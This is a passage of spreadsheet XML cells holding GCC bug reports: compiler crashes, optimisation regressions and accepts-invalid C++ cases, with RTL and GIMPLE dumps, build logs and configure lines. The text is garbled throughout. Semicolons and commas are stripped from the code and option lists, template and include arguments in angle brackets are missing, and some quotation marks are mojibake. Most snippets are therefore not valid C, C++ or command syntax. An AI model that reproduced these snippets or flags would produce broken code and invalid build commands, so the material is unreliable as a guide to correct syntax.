Release:
gcc 3.2.1
How-To-Repeat:
It's a narrow window of vulnerability but we managed to get unlucky and hit it by moving a threaded program from a uni-processor system to a dual-processor system.  I don't think a test program would be particularly useful for this bug.</t>
  </si>
  <si>
    <t>GCC-23695</t>
  </si>
  <si>
    <t>[ColdFire] Illegal move of byte intoo address register causes compiler to ICE</t>
  </si>
  <si>
    <t>I've been tracking bug #16719 as it's been of interest to me.  I noticed
Bernardo Innocenti had committed some changes to the Coldfire code that should
have resolved this problem.  I picked up gcc-4.1-20050826 to try the new code. 
My compiler ICEd with a different problem but I was able to reproduce with a
simple test case.
I will attach the preprocessed file.
Here is the command line used to compile the file and trigger the ICE and the
resultant output.
[bretts@wally bretts]$ /opt/rtems/bin/m68k-rtems-gcc -Wall -Wsign-compare -W
-Wno-unused -Wshadow -m5206e -O2 -fomit-frame-pointer -funroll-loops -save-temps
-S -o safer.s safer.c
safer.c: In function 'safer_ecb_encrypt':
safer.c:14: error: unable to find a register to spill in class 'ADDR_REGS'
safer.c:14: error: this is the insn:
(insn 57 56 59 6 (set (reg:SI 9 %a1 [87])
        (plus:SI (subreg:SI (reg/v:QI 6 %d6 [orig:86 c ] [86]) 0)
            (subreg:SI (mem:QI (plus:SI (reg/v/f:SI 10 %a2 [orig:78 key.48 ] [78])
                        (const_int 3 [0x3])) [0 S1 A8]) 0))) 96 {*addsi3_5200} (nil)
    (expr_list:REG_DEAD (reg/v:QI 6 %d6 [orig:86 c ] [86])
        (nil)))
safer.c:14: internal compiler error: in spill_failure at reload1.c:1889
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Here is the compiler build information....
[bretts@wally bretts]$ /opt/rtems/bin/m68k-rtems-gcc -v
Using built-in specs.
Target: m68k-rtems
Configured with: ../gcc-4.1-20050826/configure --target=m68k-rtems
--prefix=/opt/rtems --with-gnu-as --with-gnu-ld --with-newlib --verbose
--with-system-zlib --disable-nls --enable-version-specific-runtime-libs
--enable-threads=rtems --enable-languages=cc++
Thread model: rtems
gcc version 4.1.0 20050826 (experimental)</t>
  </si>
  <si>
    <t>brett.swimley</t>
  </si>
  <si>
    <t>GCC-14475</t>
  </si>
  <si>
    <t>[tree-ssa] [regression] ICE on bit enum field when enum is not defined</t>
  </si>
  <si>
    <t>struct tree_common
{
  enum tree_code code : 8
}
The C front-end just ICEs right away on this code.</t>
  </si>
  <si>
    <t>GCC-2539</t>
  </si>
  <si>
    <t>contrib/test_summary reports wrong version</t>
  </si>
  <si>
    <t>The script contrib/test_summary extracts the libstdc++-v3 version rather than the compiler version.  Consequently the subject of the mail message is wrong.
I guess this is a consequence of the move to a dejagnu framework for libstdc++-v3 which results is a line of form
/exd4/billingd/src/gcc-mainline/libstdc++-v3 version 20010406
in libstdc++-v3.sum
Release:
gcc version 3.1 20010410 (experimental)
Environment:
mips-sgi-irix6.5
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-18770</t>
  </si>
  <si>
    <t>g++ accepts invalid code with scopes on ifs</t>
  </si>
  <si>
    <t>According to ISO/IEC 14882 6.4-3 the following snippet is ill-formed:
if (int x = 1)
{
  int x = 2 // redeclaration of x
}
Yet the g++ versions that come with Fedora Core 3 accept it.
Specifically these versions are:
gcc version 3.3.4 20040817 (Red Hat Linux 3.3.4-2)
gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)
gcc version 4.0.0 20041019 (Red Hat 4.0.0-0.8)</t>
  </si>
  <si>
    <t>GCC-56430</t>
  </si>
  <si>
    <t>In __airy: return-statement with a value in function returning 'void'.</t>
  </si>
  <si>
    <t>Created attachment 29525
Patch removing return of number from void function (returning from other functions).
In __airy an internal implementation function inside include/tr1/modified_bessel_func.tcc there was a return of a number from a void function.
This function was not used obviously - it was intended for a future extension that is slated for 4.9.  It seems sensible to me however to fix the bug.  This function is being used in new development.  There's no reason to let it lie and there is little risk in fixing it.
Testing the attached patch on x86_64-linux.</t>
  </si>
  <si>
    <t>GCC-69042</t>
  </si>
  <si>
    <t>[6 regression] Missed optimization in ivopts</t>
  </si>
  <si>
    <t>Created attachment 37127
Reproducer
Here is a reduced loop:
  for (i = 1 i &lt; 64 i++) {
    if (data[indexes[i]]) {
      j++
    } else {
      if (p (j))
        return 0
      j = 0
    }
  }
'i' is used for indexes access only.  Therefore it may be optimized out and replaced with (indexes + i).  That's what GCC 5.3 actually does.  Here is a GIMPLE for GCC 5.3 after ivopts:
  :
  # j_23 = PHI 
  # ivtmp.14_21 = PHI 
  _6 = (void *) ivtmp.14_21
  _9 = MEM[base: _6 offset: 4B]
  _10 = (unsigned int) _9
  _11 = _10 * 2
  _13 = data_12(D) + _11
  _14 = *_13
  if (_14 != 0)
    goto 
  else
    goto 
  :
  j_15 = j_23 + 1
  goto 
  :
  _18 = p (j_23)
  if (_18 != 0)
    goto 
  else
    goto 
  :
  # j_2 = PHI 
  ivtmp.14_20 = ivtmp.14_21 + 4
  if (ivtmp.14_20 != _1)
    goto 
  else
    goto 
  :
  goto 
But GCC 6 doesn't do it starting from r230647 resulting in additional
address computation and increased registers pressure. Here is a GIMPLE
for GCC6 after ivopts:
  :
  # i_23 = PHI 
  # j_24 = PHI 
  _21 = (sizetype) i_23
  _20 = _21 * 4
  _9 = MEM[symbol: indexes index: _20 offset: 0B]
  _10 = (unsigned int) _9
  _11 = _10 * 2
  _13 = data_12(D) + _11
  _14 = *_13
  if (_14 != 0)
    goto 
  else
    goto 
  :
  j_15 = j_24 + 1
  goto 
  :
  _18 = p (j_24)
  if (_18 != 0)
    goto 
  else
    goto 
  :
  # j_2 = PHI 
  i_16 = i_23 + 1
  if (i_16 != 64)
    goto 
  else
    goto 
  :
  goto 
Testcase was made on base of EEMBC cjpegv2 benchmarks whose loop
has a ~15% performance loss on Silvermont due to this issue.
In attached testcase I put __asm__ to emulate register pressure and
demonstrate resulting load in a regressed loop version for i386.
Here is how I build the test:
gcc -S -m32 -fPIE -pie -O2 test.c
Used compiler:
Target: x86_64-pc-linux-gnu
Configured with: /export/users/gnutester/stability/svn/trunk/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --with-pkgversion=Revision=231837 --prefix=/export/users/gnutester/stability/work/trunk/64/install --enable-languages=cc++fortranjavalto
Thread model: posix
gcc version 6.0.0 20151218 (experimental) (Revision=231837)</t>
  </si>
  <si>
    <t>GCC-48299</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: boehm-gc.c/thread_leak_test.c</t>
  </si>
  <si>
    <t>On Linux/x86 I got
In file included from /export/gnu/import/git/gcc-avx/boehm-gc/testsuite/../include/gc.h:56:0^M
                 from /export/gnu/import/git/gcc-avx/boehm-gc/testsuite/../include/leak_detector.h:2^M
                 from /export/gnu/import/git/gcc-avx/boehm-gc/testsuite/boehm-gc.c/thread_leak_test.c:2:^M
/export/build/gnu/gcc-avx/build-x86_64-linux/x86_64-unknown-linux-gnu/32/boehm-gc/include/gc_config.h:44:0: warning: GC_LINUX_THREADS redefined [enabled by default]^M
/export/gnu/import/git/gcc-avx/boehm-gc/testsuite/boehm-gc.c/thread_leak_test.c:1:0: note: this is the location of the previous definition^M
FAIL: boehm-gc.c/thread_leak_test.c -O2 (test for excess errors)
Revision 171513 is OK. It may be caused by revision 171514:
http://gcc.gnu.org/ml/gcc-cvs/2011-03/msg00938.html</t>
  </si>
  <si>
    <t>GCC-77765</t>
  </si>
  <si>
    <t>ICE in gfc_match_oacc_routine at fortran/openmp.c:1781</t>
  </si>
  <si>
    <t>For versions 567 with -fopenacc :
$ cat z1.f90
module m
contains
   recursive function f(x)
   end
   recursive function f(x)
   !$acc routine (f)
   end
end
$ gfortran-7-20160925 -fopenacc z1.f90
z1.f90:5:23:
z1.f90:3:3:
    recursive function f(x)
   2
z1.f90:5:23:
    recursive function f(x)
                       1
Error: Procedure 'f' at (1) is already defined at (2)
z1.f90:3:3:
    recursive function f(x)
   1
Error: Duplicate RECURSIVE attribute specified at (1)
f951: internal compiler error: Segmentation fault
0xc28c9f crash_signal
        ../../gcc/toplev.c:337
0x6cd44a gfc_match_oacc_routine()
        ../../gcc/fortran/openmp.c:1781
0x6d3f89 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6d464e match_word
        ../../gcc/fortran/parse.c:656
0x6d464e decode_oacc_directive
        ../../gcc/fortran/parse.c:685
0x6d9878 next_free
        ../../gcc/fortran/parse.c:1132
0x6d9878 next_statement
        ../../gcc/fortran/parse.c:1380
0x6dccc4 parse_contained
        ../../gcc/fortran/parse.c:5366
0x6ddad9 parse_module
        ../../gcc/fortran/parse.c:5759
0x6de4a9 gfc_parse_file()
        ../../gcc/fortran/parse.c:6065
0x720d82 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-61451</t>
  </si>
  <si>
    <t>Parsing aborted at cp/parser.c:23778</t>
  </si>
  <si>
    <t>Created attachment 32910
Preprocessed source produced by compilation.
The following code:
#include 
template 
struct is_generative_model {
    private:
        template  static auto test(int) -&gt; decltype(
                static_cast        (Z::*)(size_tsize_t) const&gt;      (&amp;Z::sampleOR)
                static_cast (Z::*)(size_tsize_t) const&gt;      (&amp;Z::sampleSOR)
                std::true_type()
                )
        template  static auto test(...) -&gt; std::false_type
    public:
        enum { value = std::is_same(0))std::true_type&gt;::value }
}
int main() {
    return 0
}
When compiled with:
g++ -std=c++11 main.cpp
Triggers the following error:
main.cpp:8:110: internal compiler error: in cp_parser_abort_tentative_parse at cp/parser.c:23778
                 static_cast        (Z::*)(size_tsize_t) const&gt;      (&amp;Z::sampleOR)
                                                                                                              ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccYAAuUj.out file please attach this to your bugreport.
With compiler version:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.2-19ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1)</t>
  </si>
  <si>
    <t>GCC-66340</t>
  </si>
  <si>
    <t>[6 Regression] profiledbootstrap failure on x86-64 with LTO</t>
  </si>
  <si>
    <t>On Linux/x86-64 r223861 caused:
./../src-trunk/gcc/cfgcleanup.c: In function Ã¢delete_dead_jumptablesÃ¢:
../../src-trunk/gcc/cfgcleanup.c:2991:1: internal compiler error: in dfs_enumerate_from at cfganal.c:1195
 delete_dead_jumptables (void)
 ^
0x6c9386 dfs_enumerate_from(basic_block_def* int bool (*)(basic_block_def const* void const*) basic_block_def** int void const*)
	../../src-trunk/gcc/cfganal.c:1195
0x114dd7e determine_bb_domination_status
	../../src-trunk/gcc/tree-ssa-threadupdate.c:1768
0x114dd7e thread_through_loop_header
	../../src-trunk/gcc/tree-ssa-threadupdate.c:1953
0x1150c28 thread_through_all_blocks(bool)
	../../src-trunk/gcc/tree-ssa-threadupdate.c:2667
0x1003d5b execute
	../../src-trunk/gcc/tree-ssa-dom.c:1244
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[7]: *** [/tmp/ccgXjrua.ltrans11.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: fatal error: make returned 2 exit status
compilation terminated.
/usr/local/bin/ld: error: lto-wrapper failed
when profiledbootstrap with LTO:
configure --prefix=/export/gnu/import/git/gcc-regression-bootstrap/master/223861/usr --enable-clocale=gnu --with-system-zlib --with-demangler-in-ld --enable-languages=cc++ --enable-bootstrap --with-fpmath=sse --with-build-config=bootstrap-lto --disable-werror --disable-multilib --disable-libcc1 --disable-libcilkrts --disable-libsanitizer
make -j8 profiledbootstrap</t>
  </si>
  <si>
    <t>GCC-2204</t>
  </si>
  <si>
    <t>G++ doesn't check (member) function parameter for abstract-ness.</t>
  </si>
  <si>
    <t>The program construct is ill-formed and should be
diagnosed as per 10.4/3. 
-- Gaby
Release:
gcc-2.95.x and gcc-3_0-branch are affected.
Environment:
Platform independent.
How-To-Repeat:
struct X {
  virtual void f() = 0
  void g(X) { }
}</t>
  </si>
  <si>
    <t>GCC-52010</t>
  </si>
  <si>
    <t>[OOP] Intrinsic assignment of a CLASS to a TYPE</t>
  </si>
  <si>
    <t>The attached examle generates a compiler error about not being able to convert from CLASS to TYPE being the object of the same declared type.
Reported bug 41719 addresses partially this issue although looking at the standard (7.4.1) I cannot really see that this assignment is incorrect.
The Intel compiler does not complain about this even with the stardard 2003 flags activated.</t>
  </si>
  <si>
    <t>GCC-68343</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/graphite/fuse-{12}.c scan-tree-dumps</t>
  </si>
  <si>
    <t>Fails with revision r230329 (on x86_64):
...
FAIL: gcc.dg/graphite/fuse-2.c scan-tree-dump-times graphite ISL AST generated by ISL:.*for \\(int c0 = 0 c0 &lt;= 99 c0 \\+= 1\\) {.*S_.*\\(c0\\).*S_.*\\(c0\\).*S_.*\\(c0\\).*} 1
FAIL: gcc.dg/graphite/fuse-1.c scan-tree-dump-times graphite ISL AST generated by ISL:.*for \\(int c0 = 0 c0 &lt;= 99 c0 \\+= 1\\) {.*S_.*\\(c0\\).*S_.*\\(c0\\).*S_.*\\(c0\\).*} 1
FAIL: gcc.dg/graphite/fuse-1.c scan-tree-dump-times forwprop4 gimple_simplified to[^\\n]*\\^ 12 1
...</t>
  </si>
  <si>
    <t>GCC-56071</t>
  </si>
  <si>
    <t>friend class template cannot access private constructor in exception-specification</t>
  </si>
  <si>
    <t>$ g++ --version
g++ (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2
The following code is accepted by clang++ but not g++:
class B
{
  template  friend struct A
private:
    B() {}
    ~B() {}
}
template 
struct A
{
    T t
    B b
    A() noexcept(noexcept(B())) {}
}
#define BREAK
struct C {
  A delegate
  C()
#ifdef BREAK
      noexcept(noexcept(A()))
#endif
    { }
}
int main() {return 0}
If the #define BREAK is commented out it is accepted by g++ too. Making A not a template type also makes g++ accept it.</t>
  </si>
  <si>
    <t>steveire</t>
  </si>
  <si>
    <t>GCC-50249</t>
  </si>
  <si>
    <t>ira marks wrong value for inheriting</t>
  </si>
  <si>
    <t>Using an approved-for-commit middle-end patch for bug 43864 I hit the following
error in ira:
Before ira insn 320 defines r588 which is used in identical loads insn 321 and
insn 329.
10.cc.188r.asmcons:
...
(insn 320 318 321 20 (set (reg/f:SI 588)
        (plus:SI (reg/f:SI 166)
            (const_int -12))) 5 {*thumb1_addsi3}
     (nil))
(insn 321 320 322 20 (set (reg:SI 379)
        (mem:SI (reg/f:SI 588))) 177 {*thumb1_movsi_insn}
     (nil))
(insn 322 321 326 20 (set (mem/s/f:SI (plus:SI (reg/f:SI 329)
		(reg:SI 379)))
        (reg/f:SI 170)) 177 {*thumb1_movsi_insn}
     (expr_list:REG_DEAD (reg:SI 379)
        (nil)))
(insn 326 322 329 20 (set (mem/s/c:SI (plus:SI (reg/f:SI 329)
                (const_int 4)))
        (reg:SI 338)) 177 {*thumb1_movsi_insn}
     (expr_list:REG_DEAD (reg:SI 338)
        (nil)))
(insn 329 326 330 20 (set (reg:SI 386)
        (mem:SI (reg/f:SI 588) )) 177 {*thumb1_movsi_insn}
     (nil))
(insn 330 329 331 20 (set (reg:SI 385)
        (plus:SI (reg/f:SI 329)
            (reg:SI 386))) 5 {*thumb1_addsi3}
     (expr_list:REG_DEAD (reg:SI 386)
        (nil)))
...
After ira r588 is defined by insn 1140 insn 1141 an insn 320 in r10.
It is then copied to r1 by insn 1143 before being used in the first load
insn 1144. This first load also overwrites r1.
The second load insn 1146 however uses r1 as if is was still a copy of r10.
10.cc.191r.ira:
...
(insn 1140 1139 1141 20 (set (reg/f:SI 10 sl [588])
        (reg:SI 1 r1)) 177 {*thumb1_movsi_insn}
     (nil))
(insn 1141 1140 320 20 (set (reg:SI 2 r2)
        (const_int -12)) 177 {*thumb1_movsi_insn}
     (nil))
(insn 320 1141 321 20 (set (reg/f:SI 10 sl [588])
        (plus:SI (reg/f:SI 10 sl [588])
            (reg:SI 2 r2))) 5 {*thumb1_addsi3}
     (nil))
(note 321 320 1145 20 NOTE_INSN_DELETED)
(insn 1145 321 1142 20 (set (reg:SI 0 r0)
        (mem/c:SI (plus:SI (reg/f:SI 13 sp)
                (const_int 12))))
      177 {*thumb1_movsi_insn}
     (nil))
(insn 1142 1145 1143 20 (set (reg:SI 2 r2)
        (plus:SI (reg/f:SI 13 sp)
            (const_int 336))) 5 {*thumb1_addsi3}
     (nil))
(insn 1143 1142 1144 20 (set (reg:SI 1 r1)
        (reg/f:SI 10 sl [588])) 177 {*thumb1_movsi_insn}
     (nil))
(insn 1144 1143 322 20 (set (reg:SI 1 r1)
        (mem:SI (reg:SI 1 r1)))
      177 {*thumb1_movsi_insn}
     (nil))
(insn 322 1144 326 20 (set (mem/s/f:SI (plus:SI (reg:SI 2 r2)
                (reg:SI 1 r1)))
        (reg:SI 0 r0)) 177 {*thumb1_movsi_insn}
     (nil))
(insn 326 322 329 20 (set (mem/s/c:SI (plus:SI (reg/f:SI 13 sp)
	        (const_int 340)))
        (reg:SI 3 r3 [338])) 177 {*thumb1_movsi_insn}
     (nil))
(note 329 326 1146 20 NOTE_INSN_DELETED)
(insn 1146 329 330 20 (set (reg:SI 1 r1)
        (mem:SI (reg:SI 1 r1)))
      177 {*thumb1_movsi_insn}
     (nil))
(insn 330 1146 332 20 (set (reg:SI 0 r0 [385])
        (plus:SI (reg:SI 2 r2)
            (reg:SI 1 r1))) 5 {*thumb1_addsi3}
     (nil))
...
The reloads for insn 322 are visible in the ira dump. Reload 1 is the copy from
r10 to r1. Reload 2 is the first load.
10.cc.191r.ira:
...
Reloads for insn # 322
Reload 0: reload_in (SI) = (plus:SI (reg/f:SI 13 sp)
                                                    (const_int 336))
        LO_REGS RELOAD_FOR_OPERAND_ADDRESS (opnum = 0)
        reload_in_reg: (plus:SI (reg/f:SI 13 sp)
                                                    (const_int 336))
        reload_reg_rtx: (reg:SI 2 r2)
Reload 1: reload_in (SI) = (reg/f:SI 10 sl [588])
        BASE_REGS RELOAD_FOR_OPERAND_ADDRESS (opnum = 0)
        reload_in_reg: (reg/f:SI 10 sl [588])
        reload_reg_rtx: (reg:SI 1 r1)
Reload 2: reload_in (SI) = (mem:SI (reg/f:SI 10 sl [588]))
        LO_REGS RELOAD_FOR_OPERAND_ADDRESS (opnum = 0) can't combine
	reload_in_reg: (reg:SI 379)
        reload_reg_rtx: (reg:SI 1 r1)
Reload 3: LO_REGS RELOAD_FOR_OPERAND_ADDRESS (opnum = 0) optional can't
          combine secondary_reload_p
Reload 4: reload_out (SI) = (mem/s/f:SI (plus:SI (plus:SI (reg/f:SI 13 sp)
                                                            (const_int 336))
                                                        (reg:SI 379 )))
	NO_REGS RELOAD_FOR_OUTPUT (opnum = 0) optional
        reload_out_reg: (mem/s/f:SI (plus:SI (plus:SI (reg/f:SI 13 sp)
	                                                    (const_int 336))
                                                        (reg:SI 379)))
        secondary_out_reload = 3
Reload 5: reload_in (SI) = (reg/f:SI 170)
        LO_REGS RELOAD_FOR_INPUT (opnum = 1)
        reload_in_reg: (reg/f:SI 170)
        reload_reg_rtx: (reg:SI 0 r0)
...
in emit_reload_insns ira determines which reloads can be inherited by later
instructions by testing reload_reg_reaches_end_p (and reload_regs_reach_end_p).
These tests return true for both reload 1 and reload 2 since they call the
functions with the same arguments.  It seems that the functions
mark_reload_reg_in_use and reload_reg_reaches_end_p and the underlying 
adminstration do not distinguish between the 2 reloads. They have the same
regno opnum type and mode.
So we end up setting reg_reloaded_contents twice once for each reload. Since we
do this in reload_order we first handle reload 2 and then reload 1. So the
effective reg_reloaded_contents is the one of reload 1 while it should be the 
one of reload 2.</t>
  </si>
  <si>
    <t>GCC-30825</t>
  </si>
  <si>
    <t>[4.3 Regression] current mainline fails to bootstrap when -msse is used</t>
  </si>
  <si>
    <t>Hi
current mainline (revision 122038) produces an ICE in stage 2 when configured with --with-arch=athlon64:
~/rcs-data/gcc-svn/configure --prefix=$HOME/env/gcc --enable-languages=c --with-arch=athlon64 &amp;&amp; make
...
/home/julian/build/bld.gcc/./gcc/xgcc -B/home/julian/build/bld.gcc/./gcc/ -B/home/julian/env/gcc/i686-pc-linux-gnu/bin/ -B/home/julian/env/gcc/i686-pc-linux-gnu/lib/ -isystem /home/julian/env/gcc/i686-pc-linux-gnu/include -isystem /home/julian/env/gcc/i686-pc-linux-gnu/sys-include -O2 -g -O2 -O2  -O2 -g -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/home/julian/rcs-data/gcc-svn/libgcc -I/home/julian/rcs-data/gcc-svn/libgcc/. -I/home/julian/rcs-data/gcc-svn/libgcc/../gcc -I/home/julian/rcs-data/gcc-svn/libgcc/../include -I/home/julian/rcs-data/gcc-svn/libgcc/../libdecnumber -I../../libdecnumber -o _fixunsxfdi.o -MT _fixunsxfdi.o -MD -MP -MF _fixunsxfdi.dep -DL_fixunsxfdi -c /home/julian/rcs-data/gcc-svn/libgcc/../gcc/libgcc2.c \
          -fvisibility=hidden -DHIDE_EXPORTS
/home/julian/rcs-data/gcc-svn/libgcc/../gcc/libgcc2.c: In function '__fixunsxfdi':
/home/julian/rcs-data/gcc-svn/libgcc/../gcc/libgcc2.c:1245: error: verify_flow_info: Wrong probability of edge 7-&gt;9 -2147483648
/home/julian/rcs-data/gcc-svn/libgcc/../gcc/libgcc2.c:1245: error: verify_flow_info: Wrong probability of edge 7-&gt;8 -2147473648
/home/julian/rcs-data/gcc-svn/libgcc/../gcc/libgcc2.c:1245: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [_fixunsxfdi.o] Error 1
make[3]: Leaving directory `/home/julian/build/bld.gcc/i686-pc-linux-gnu/libgcc'
make[2]: *** [all-stage2-target-libgcc] Error 2
make[2]: Leaving directory `/home/julian/build/bld.gcc'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/home/julian/build/bld.gcc'
make: *** [all] Error 2
When configured without --with-arch=athlon64 the build succeeds. The problem has probably been introduced since 2007-02-09.</t>
  </si>
  <si>
    <t>GCC-12846</t>
  </si>
  <si>
    <t>No warning when function pointer cast drops __attribute__ ((regparm))</t>
  </si>
  <si>
    <t>The following code is invalid and won't work correctly (because the cast drops
the __attribute__ and changes the calling convention):
void test (int a) __attribute__ ((regparm (3)))
...
void (*ptest) (int) = test  /* wrong */
ptest (a)
However GCC miscompiles it without a warning. If the same thing is done with
__attribute__ ((stdcall)) instead (which also changes the calling convention)
GCC gives warning: initialization from incompatible pointer type. Shouldn't it
give this warning for __attribute__ ((regparm (3))) as well?</t>
  </si>
  <si>
    <t>GCC-46629</t>
  </si>
  <si>
    <t>[4.6 Regression] Failed to build 200.sixtrack in SPEC CPU 2000</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 167092 failed to build 200.sixtrack in SPEC CPU 2000
with
-m32 -O3 -funroll-loops -msse2 -mfpmath=sse -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin
I got
foxys.f:1658.17:
      CALL DAALL(IALL1'$$UNPACK$$'NOMAXNVMAX)                       
                 1
Warning: Rank mismatch in argument 'ic' at (1) (rank-1 and scalar)
foxys.f:1664.17:
      CALL DAALL(IALL1AAINVMAX)                                     
                 1
Warning: Rank mismatch in argument 'ic' at (1) (rank-1 and scalar)
foxys.f: In function 'dafunt_':
foxys.f:4119:0: internal compiler error: in maybe_cleanup_end_of_block at cfgexpand.c:1700
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
specmake[1]: *** [foxys.o] Error 1
specmake[1]: *** Waiting for unfinished jobs....
[hjl@gnu-35 gcc-test-spec]$ ./usr/bin/gcc -v
Using built-in specs.
COLLECT_GCC=./usr/bin/gcc
COLLECT_LTO_WRAPPER=/export/gnu/import/svn/gcc-test-spec/usr/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /export/gnu/import/git/gcc/configure --enable-clocale=gnu --with-system-zlib --with-demangler-in-ld --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-haifa --prefix=/usr/gcc-4.6.0 --with-local-prefix=/usr/local --with-fpmath=sse --with-plugin-ld=ld
Thread model: posix
gcc version 4.6.0 20101123 (experimental) (GCC) 
[hjl@gnu-35 gcc-test-spec]$</t>
  </si>
  <si>
    <t>GCC-51986</t>
  </si>
  <si>
    <t>[4.7 regression] uninitialized variable warning regression prevents bootstrap</t>
  </si>
  <si>
    <t>This just started in the last few days:
/tmp/gcc-obj/./prev-gcc/g++ -B/tmp/gcc-obj/./prev-gcc/ -B/home/matt/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -I/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include -I/home/matt/src/gcc-4.7.0/libstdc++-v3/libsupc++ -L/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/tmp/gcc-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c   -g -O2 -flto=jobserver -frandom-seed=1 -O2 -finline-functions -funswitch-loops -fpredictive-commoning -fgcse-after-reload -ftree-vectorize -ffast-math -floop-interchange -floop-strip-mine -floop-block -ftree-loop-distribution -ftree-loop-distribute-patterns -ftree-loop-im -ftree-loop-ivcanon -fivopts -fweb -DIN_GCC   -fno-exceptions -fno-rtti -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I/home/matt/src/gcc-4.7.0/gcc -I/home/matt/src/gcc-4.7.0/gcc/. -I/home/matt/src/gcc-4.7.0/gcc/../include -I/home/matt/src/gcc-4.7.0/gcc/../libcpp/include  -I/home/matt/src/gcc-4.7.0/gcc/../libdecnumber -I/home/matt/src/gcc-4.7.0/gcc/../libdecnumber/bid -I../libdecnumber    /home/matt/src/gcc-4.7.0/gcc/sched-deps.c -o sched-deps.o
/home/matt/src/gcc-4.7.0/gcc/sched-deps.c: In function â€˜sched_get_condition_with_rev(rtx_def const* bool*)â€™:
/home/matt/src/gcc-4.7.0/gcc/sched-deps.c:599:33: error: â€˜tmpâ€™ may be used uninitialized in this function [-Werror=maybe-uninitialized]
Verified that it is a false positive as sched_get_condition_with_rev_uncached() always sets the contents of the bool in question (if it isn't NULL and it isn't in this case).
Can be reduced to -O2 -finline-functions which probably isn't getting tested much since using the bootstrap-O3 config has been broken for months now.
Pre-processed sources are attached.</t>
  </si>
  <si>
    <t>GCC-44688</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] Excessive code-size growth at -O3</t>
  </si>
  <si>
    <t>The enablement of -fprefetch-loop-arrays by default at -O3 has caused
excessive code-size and compile-time growth for Polyhedron and SPEC CPU 2006.
http://gcc.opensuse.org/SPEC/CFP/sb-barbella.suse.de-head-64-2006/times.html
http://gcc.opensuse.org/SPEC/CFP/sb-barbella.suse.de-head-64-2006/size.html</t>
  </si>
  <si>
    <t>GCC-56871</t>
  </si>
  <si>
    <t>[c++11] Specialization of constexpr Templated Function</t>
  </si>
  <si>
    <t>Consider the code below
template constexpr int foo(T) { return 0 }
template int foo(int) { return 1 }
Compiling this code with g++-4.8.0 -Wall -c -std=c++0x bug.cpp throws the following error:
bug.cpp:2:23: error: redeclaration â€˜constexpr int foo(T) [with T = int]â€™ differs in â€˜constexprâ€™
 template int foo(int) { return 1 }
                       ^
bug.cpp:1:36: error: from previous declaration â€˜constexpr int foo(T) [with T = int]â€™
 template constexpr int foo(T) { return 0 }
Yet the C++ standard (section 7.1.5) says that an explicit specialization can differ from the template declaration with respect to the constexpr specifier.</t>
  </si>
  <si>
    <t>david.narvaez</t>
  </si>
  <si>
